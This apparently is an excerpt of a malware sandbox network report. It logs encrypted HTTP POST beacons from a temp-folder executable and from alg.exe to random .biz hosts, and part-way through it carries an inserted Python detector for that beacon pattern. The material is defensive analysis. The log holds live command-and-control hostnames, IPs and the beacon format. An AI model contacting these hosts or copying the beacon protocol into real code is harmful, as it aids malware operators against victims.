    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.10 | 49846 | 44.221.84.105 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:06.665132999 CET | 347 | OUT | POST /bgr HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: npukfztj.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:13:06.665157080 CET | 834 | OUT | Data Raw: 52 a0 0b 76 1e 9e 22 3a 36 03 00 00 a1 6a 15 b3 02 c8 63 2d 66 6d e3 58 31 54 ca 2b 8c 47 1f 87 32 f8 d6 ae 23 b4 c3 2e c3 2d 1e 54 a8 cf a5 24 3f 8c 61 1f 05 e7 38 92 08 44 27 fc 13 26 c2 73 03 35 d1 4c eb 30 2f 45 7c 8f 45 96 5f 67 da 29 42 b7
    Data Ascii: Rv":6jc-fmX1T+G2#.-T$?a8D'&s5L0/E|E_g)BFaw"m4dJPJ<3,*=@)>),rs:1$xyw45p`-N:n+_n&L1mI\})&}ERt%a6P"DiOM{}q6_=A(;
Nov 26, 2024 08:13:07.854161978 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:13:07 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2dc74860b8aa8b6b86b8ac6dff52f003|8.46.123.75|1732605187|1732605187|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.10 | 49851 | 172.234.222.143 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:08.165918112 CET | 347 | OUT | POST /fafj HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:13:08.165918112 CET | 834 | OUT | Data Raw: b8 2b 52 8a 49 80 70 12 36 03 00 00 17 8f 70 2d e7 f7 17 79 d1 25 97 c4 ae ef 87 cd 64 89 6b 2a 1e 0d b0 a2 26 75 cb 38 36 52 99 29 31 1f b8 03 1e 53 74 0d ec a5 06 28 e1 3b 9b d3 ef 4c 15 1f 6f 07 5e ae 19 16 a2 58 6e 77 12 58 8d 9b c6 f1 e7 e3
    Data Ascii: +RIp6p-y%dk*&u86R)1St(;Lo^XnwXbp[)3xYR?B%lVdD{y`jZP)5Fl*Pcr(EElAt.@4vfA&"k!s*F}{:3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.10 | 49853 | 172.234.222.143 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:09.488784075 CET | 357 | OUT | POST /dadmwtnbmefxvi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:13:09.488806009 CET | 834 | OUT | Data Raw: 2d ea 59 cb 26 31 28 af 36 03 00 00 da 40 bf f2 1f 08 07 5a df 80 b8 79 29 1a 1b 03 b1 13 ea bc 8d 0a 1e 79 36 f5 e3 de 06 03 2e 18 98 d5 a4 87 b5 97 b5 c2 3c 45 44 56 40 93 26 03 ac 29 a5 7d e9 0a b7 67 14 b3 9c 4a 7f 24 26 ae 73 5b 1f 7c 6d 22
    Data Ascii: -Y&1(6@Zy)y6.<EDV@&)}gJ$&s[|m"CK|IYH<UD@Vo4'Y`?B}+<`'"6>oir7fo`2mV~_[)tJrsB3l]C;D,7B.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.10 | 49860 | 18.141.10.107 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:11.145468950 CET | 358 | OUT | POST /wofnqkoxvbvigg HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: knjghuig.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:13:11.145782948 CET | 834 | OUT | Data Raw: cd 12 e9 a2 2f 0f cc aa 36 03 00 00 53 61 ce 7b 4d 55 5e 0c 92 71 56 da cc 94 e6 fd 68 e1 14 6b f7 80 8b 50 66 3f 4d 05 80 da 84 d0 cd cf 45 b9 f4 7d 85 ad d0 aa 30 21 98 f7 c3 f7 9c 63 9d 57 97 6a a3 3a 38 25 58 06 bd 27 2c 33 dc 47 d7 50 f5 03
    Data Ascii: /6Sa{MU^qVhkPf?ME}0!cWj:8%X',3GP7|,fA%9]M*00WCb+9K$VhZCij(!Yu"uJ.rkc+U3Bsf{$pwoLp3|rSR<!A8la4Vvl(=
Nov 26, 2024 08:13:13.220674038 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 26 Nov 2024 07:13:12 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=2660d4084d1da275e8a6bf0ac7a0d8bb|8.46.123.75|1732605192|1732605192|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.10 | 49867 | 82.112.184.197 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:13.813477993 CET | 345 | OUT | POST /ccx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:13:13.813507080 CET | 834 | OUT | Data Raw: 02 b0 55 83 17 b7 b0 69 36 03 00 00 47 22 53 8e 36 64 82 a1 cc 00 fb ed b4 33 00 d0 f3 bc bb 50 c5 f6 d2 24 53 f7 7c fe e2 d1 ad 2e 0e 60 58 d1 09 0b 85 e8 d2 68 57 7b 6c 00 26 67 e4 f2 18 38 c8 a7 95 65 b2 6a 92 c2 1d f8 97 ba 1b 29 7b 86 29 5f
    Data Ascii: Ui6G"S6d3P$S|.`XhW{l&g8ej){)_!wXBdJJ"']{#3Cov9{ec3Ob1.?arM%(u<PVoET%X|/tT<yy_S ].d3y`P,8Q}?J\ZM9gs1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.10 | 49871 | 82.112.184.197 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:14.600614071 CET | 357 | OUT | POST /nbnssijhjwmugla HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:13:14.600627899 CET | 778 | OUT | Data Raw: 7e 58 aa c6 2f eb 3c 69 fe 02 00 00 25 ee 05 aa 81 6f 85 91 b4 74 cd 7b b2 18 5b c1 ba c3 20 82 d0 49 4d 66 63 5b 74 c9 eb b9 c7 69 ea 83 a3 04 d1 0d 92 bd 1f 78 4f 82 91 c3 fb 55 1e 47 6e d4 b6 82 7e ea 22 8e 02 a1 bd dc 2b a3 bf af 28 55 63 40
    Data Ascii: ~X/<i%ot{[ IMfc[tixOUGn~"+(Uc@W@j9Q#Ye0 /,Vlplo7"e/Rv\F%%mv<JDx90I{7z ^@l=,2"N)Siw-wGU1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.10 | 49909 | 82.112.184.197 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:32.721420050 CET | 353 | OUT | POST /hpkejgwwxdp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 834
Nov 26, 2024 08:13:32.723139048 CET | 834 | OUT | Data Raw: 4a 12 0f 0c 68 cd dc e4 36 03 00 00 06 42 52 ff 44 b3 d3 11 58 90 c0 2c 0d b5 62 48 54 43 96 e2 a6 91 13 5b 47 62 48 38 62 86 be 57 f9 c8 f4 c4 71 a3 96 09 0d 28 72 aa f3 db cd ef 78 3c 00 fc ee 20 c8 13 e3 8b 58 50 d1 5f 89 1b 10 da 31 63 f6 73
    Data Ascii: Jh6BRDX,bHTC[GbH8bWq(rx< XP_1csMd~GS L-4AH'|ire(|3%c6@<xV^X:7jRuwy)ja)XlH;4"`c{t|c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.10 | 49921 | 82.112.184.197 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:37.925230026 CET | 361 | OUT | POST /pnckkgdjorsjoiow HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Nov 26, 2024 08:13:37.925251961 CET | 778 | OUT | Data Raw: a8 af 04 fa a7 a3 97 31 fe 02 00 00 df e5 9c fa 5d d5 aa 44 e4 f4 ca 55 57 5b af 33 45 b6 fb f6 4a de 06 78 23 20 32 01 eb 31 1a 52 fb 8b 4c 62 6a 0f 04 3b 88 01 b4 3e 72 b4 7f 97 cf 6c 99 56 ec 8d 26 78 72 84 38 d7 eb ad cd 30 71 54 7d 2a 15 7a
    Data Ascii: 1]DUW[3EJx# 21RLbj;>rlV&xr80qT}*zXDaPn:1lr)|1Mk*O7CkKEZSBZHU<*2=:+[:_ru@vD)f2NRa7l.=+._Ez


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.10 | 49960 | 82.112.184.197 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:13:55.127099991 CET | 357 | OUT | POST /dhyyqtllpdwr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:13:55.127124071 CET | 834 | OUT | Data Raw: 22 13 ae 87 34 f1 1f 56 36 03 00 00 91 f0 55 fa 0b 55 c7 a0 e0 e2 fe b8 b9 ac 3f 2e 83 b6 77 cd 8b 02 c5 ae 1a c0 9f e9 45 33 b4 d8 5b 1e 45 9a df 1e d9 d3 a4 89 c1 45 23 ac 5f 57 77 86 1a c6 2f 71 3f ec f9 a9 a1 a3 01 c4 54 99 67 c5 82 4e 54 73
Data Ascii: "4V6UU?.wE3[EE#_Ww/q?TgNTs0M3DOwk:]?{!:M2|cf+1c3{a\Nf&dJhz3FfS~Sf3:9x3UGu*QB#8^/|p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.10 | 49972 | 82.112.184.197 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:00.562738895 CET | 361 | OUT | POST /btnkoeanfymxsstk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:14:00.562786102 CET | 778 | OUT | Data Raw: df d1 f6 0a f8 9c 93 76 fe 02 00 00 4f 15 46 3f 9d 7a 35 43 11 3c 60 b6 25 07 db 57 f6 c4 67 61 22 49 a2 d4 3e 8e 3a 2d 69 14 70 d5 ed 4a 27 84 7f 05 03 2c 49 e3 5d ed 11 a9 44 e2 96 74 e9 22 ef 49 5d dd 2e f1 26 ee 34 2d 65 5d e5 b7 fa 9b b2 dc
Data Ascii: vOF?z5C<`%Wga"I>:-ipJ',I]Dt"I].&4-e]lgH6WZ#,lv"N fxS7mliCw^LuDMmn8|4}M<tUBKrtA~5lC~+\bG0Oshpu={_


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.10 | 50001 | 82.112.184.197 | 80 | 7892 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:17.243869066 CET | 355 | OUT | POST /pgakntaoep HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 26, 2024 08:14:17.243946075 CET | 834 | OUT | Data Raw: 79 4a 47 30 49 30 d6 01 36 03 00 00 8f 4b f3 55 4e c2 45 6c 00 f3 4b a5 7e 9f f1 e4 17 db ad b2 54 8d 9d b1 c7 3f 6f 14 8f a0 ea c4 d1 47 bb 8a f4 f3 d8 86 b2 f1 be ce a5 67 2e 11 5c 7d b9 44 0e 71 a6 96 94 90 f8 1b 6d fb 2e 95 2e a7 60 66 ce c8
Data Ascii: yJG0I06KUNElK~T?oGg.\}Dqm..`f8w8_*RmxRV:wod;6V(F~9N>98<Zx#T?WS8`_(|-:^2O:0EXrZHW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.10 | 50009 | 47.129.31.212 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:23.392894030 CET | 351 | OUT | POST /ihrtfcsj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:14:23.392915010 CET | 778 | OUT | Data Raw: 6f 05 cd cb 03 37 b2 ea fe 02 00 00 58 5b a0 f2 af 3c 16 51 a0 da 22 42 5a 84 4c dc 28 8b 77 ad f5 42 0a 64 f1 f4 9a 5f 24 3b 32 08 5b e7 41 ac 51 cd fc 02 e4 b9 a4 69 d4 3a 30 5c db b5 b6 f5 28 ae 3f d7 8b 0d c9 37 cc 6c 97 4c 7a fe 73 98 7f 7b
Data Ascii: o7X[<Q"BZL(wBd_$;2[AQi:0\(?7lLzs{x5ars8Vy!|n=tsJK_nAXy3k97vw47!:PVt0;^l!$/7jLJKU~M0`mTb|V3R
Nov 26, 2024 08:14:25.542898893 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=901bb05c97be7640452c1c1e31eb0507|8.46.123.75|1732605265|1732605265|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.10 | 50010 | 13.251.16.150 | 80 | 6072 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:14:26.406873941 CET | 346 | OUT | POST /ywao HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 26, 2024 08:14:26.406913042 CET | 778 | OUT | Data Raw: 31 1a a7 94 bd 64 3b bf fe 02 00 00 4a 06 3a b5 1c d2 87 d0 6e 4d fc 17 8a 9f 4d 16 83 66 a4 2b 20 e3 69 7d 73 23 39 0f df 14 d2 50 6f d3 3b 7f af 0e 0e 08 cd 31 c1 4b ed 46 87 0a df 46 00 49 a3 3c 6d dc 34 9c 70 0e 0b 25 32 54 bd f4 54 4f 3b 31
Data Ascii: 1d;J:nMMf+ i}s#9Po;1KFFI<m4p%2TTO;1I-Zh/Ro_S~Ux]f{KmJ#*#?z_iK^"`cH&9.jmX`2/<vOF93i>6D7i8.t|@l%~UC
Nov 26, 2024 08:14:28.506834984 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Nov 2024 07:14:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b692de5da0901ebb7880ed3579e6ecbf|8.46.123.75|1732605268|1732605268|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
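
The sessions above share one beaconing shape, and the detector below is an added example written for this report, not code from Joe Sandbox or from the sample. Every request is a POST to a short all-lowercase path on a short .biz host, carries the same WeChat/QQBrowser User-Agent string, and sends a 778- or 834-byte body whose bytes 8..11 are a little-endian integer equal to Content-Length minus 12 (36 03 00 00 = 822 = 834 - 12; fe 02 00 00 = 766 = 778 - 12). The servers answer 200 OK with an empty chunked body, and the requests from PID 6072 are issued by C:\Windows\System32\alg.exe, a Windows system binary. The script parses raw HTTP requests and flags any that trip three or more of those indicators. The path and host regexes, the three-hit threshold, and the sample requests (constructed here with zero-filled bodies rather than the captured bytes) are assumptions made for the example.

```python
import re
import struct
from dataclasses import dataclass

# Exact User-Agent string seen on every request in the captures above.
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)
# Heuristics chosen for this example (assumptions, not taken from the report):
# a short all-lowercase path and a short all-lowercase .biz host label.
PATH_RE = re.compile(r"^/[a-z]{4,16}$")
HOST_RE = re.compile(r"^[a-z]{5,12}\.biz$")
HEADER_LEN = 12  # 8 leading bytes plus a LE uint32 payload length, as observed in the captures


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def body_length_field_matches(body: bytes) -> bool:
    """True when bytes 8..11 (LE uint32) equal the body length minus the 12-byte header."""
    if len(body) < HEADER_LEN:
        return False
    (declared,) = struct.unpack_from("<I", body, 8)
    return declared == len(body) - HEADER_LEN


def score_request(req: HttpRequest) -> list:
    """Return the beacon indicators this request trips, in a fixed order."""
    hits = []
    if req.headers.get("user-agent") == BEACON_UA:
        hits.append("fixed-wechat-ua")
    if req.method == "POST" and PATH_RE.match(req.path):
        hits.append("random-path-post")
    if HOST_RE.match(req.headers.get("host", "")):
        hits.append("random-biz-host")
    if body_length_field_matches(req.body):
        hits.append("length-prefixed-body")
    return hits


def build_request(method: str, path: str, host: str, ua: str, body: bytes) -> bytes:
    """Assemble a raw request with the same header set the captures show."""
    lines = [
        f"{method} {path} HTTP/1.1",
        "Cache-Control: no-cache",
        "Connection: Keep-Alive",
        "Pragma: no-cache",
        f"Host: {host}",
        f"User-Agent: {ua}",
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(lines).encode() + b"\r\n\r\n" + body


def beacon_body(payload_len: int) -> bytes:
    """Constructed body: 8 filler bytes, LE payload length, then zero filler (not real ciphertext)."""
    return b"\x22\x13\xae\x87\x34\xf1\x1f\x56" + struct.pack("<I", payload_len) + bytes(payload_len)


# Constructed samples modelled on the captured sessions; the benign one is a control.
SAMPLES = {
    "beacon_834": build_request("POST", "/dhyyqtllpdwr", "vjaxhpbji.biz", BEACON_UA, beacon_body(822)),
    "beacon_778": build_request("POST", "/ihrtfcsj", "xlfhhhm.biz", BEACON_UA, beacon_body(766)),
    "benign": build_request("POST", "/api/v1/login", "example.com",
                            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0", b'{"user":"a"}'),
}


def scan(samples: dict, min_hits: int = 3) -> dict:
    """Map sample name to its indicators for every request that trips at least min_hits."""
    flagged = {}
    for name, raw in samples.items():
        hits = score_request(parse_request(raw))
        if len(hits) >= min_hits:
            flagged[name] = hits
    return flagged


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(name, hits)
```

The fixed User-Agent and the length-prefixed body are the stronger signals; short lowercase paths and .biz hosts on their own will match legitimate traffic, so keep the threshold above a single indicator and pair the detector with the destination IPs and process names from the session table.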


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
31          192.168.2.10  50011        44.221.84.105    80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:29.380004883 CET  349                OUT        POST /hdfj HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: saytjshyf.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
Nov 26, 2024 08:14:29.380026102 CET  778                OUT        Data Raw: 5c d4 89 7e 10 fc 7f 92 fe 02 00 00 e0 3d a8 32 82 98 96 6d 68 84 4f c6 8b 48 fe 04 94 a6 e9 4b 0b 8f 9a 84 54 34 02 fe 29 b7 4f fd 09 44 c7 58 ef 99 b5 90 1d 08 50 5e 20 d8 f5 74 1e be 72 9d b6 cc c5 08 59 4c b7 0f f2 fc 56 61 08 55 c3 8b d6 eb
                                                                   Data Ascii: \~=2mhOHKT4)ODXP^ trYLVaU/gGT`,vs%lM_j"w*+7xEYbb>;B}2y`|> >"Ak!r4/%UpR0LTRUh:D#WiPL
Nov 26, 2024 08:14:30.529479980 CET  411                IN         HTTP/1.1 200 OK
                                                                   Server: nginx
                                                                   Date: Tue, 26 Nov 2024 07:14:30 GMT
                                                                   Content-Type: text/html
                                                                   Transfer-Encoding: chunked
                                                                   Connection: close
                                                                   Set-Cookie: btst=9441b480d1c2baa0fc400af502beb184|8.46.123.75|1732605270|1732605270|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                   Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                   Data Raw: 30 0d 0a 0d 0a
                                                                   Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
32          192.168.2.10  50012        18.141.10.107    80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:31.514348030 CET  359                OUT        POST /udjkgjnyfcxmpggx HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: vcddkls.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
Nov 26, 2024 08:14:31.514395952 CET  778                OUT        Data Raw: f3 31 36 a0 e5 b9 c5 bc fe 02 00 00 0d bb 2d 09 74 c9 9b 10 ee 7a 5b 2f 91 1e f8 db 32 24 13 54 fa a8 24 01 02 6f c8 38 d2 a4 90 66 52 b6 a0 64 69 1d 0e 36 3a 7a ea 27 42 43 18 69 93 27 89 77 7f c1 34 17 b3 c0 b2 6a 23 6e dc 53 3a cd d2 ef c2 59
                                                                   Data Ascii: 16-tz[/2$T$o8fRdi6:z'BCi'w4j#nS:Y"0609K0N.U?c^HF~f.(V8}A9 %B%L{Ub~To/n{f=eF//jgviC-w 26a$}
Nov 26, 2024 08:14:33.633343935 CET  409                IN         HTTP/1.1 200 OK
                                                                   Server: nginx
                                                                   Date: Tue, 26 Nov 2024 07:14:33 GMT
                                                                   Content-Type: text/html
                                                                   Transfer-Encoding: chunked
                                                                   Connection: close
                                                                   Set-Cookie: btst=f62f947978c38e3c4c0488de5c282e66|8.46.123.75|1732605273|1732605273|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                   Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                   Data Raw: 30 0d 0a 0d 0a
                                                                   Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
33          192.168.2.10  50013        172.234.222.138  80                6072  C:\Windows\System32\alg.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 26, 2024 08:14:35.133096933 CET  349                OUT        POST /lhiqwpom HTTP/1.1
                                                                   Cache-Control: no-cache
                                                                   Connection: Keep-Alive
                                                                   Pragma: no-cache
                                                                   Host: fwiwk.biz
                                                                   User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                   Content-Length: 778
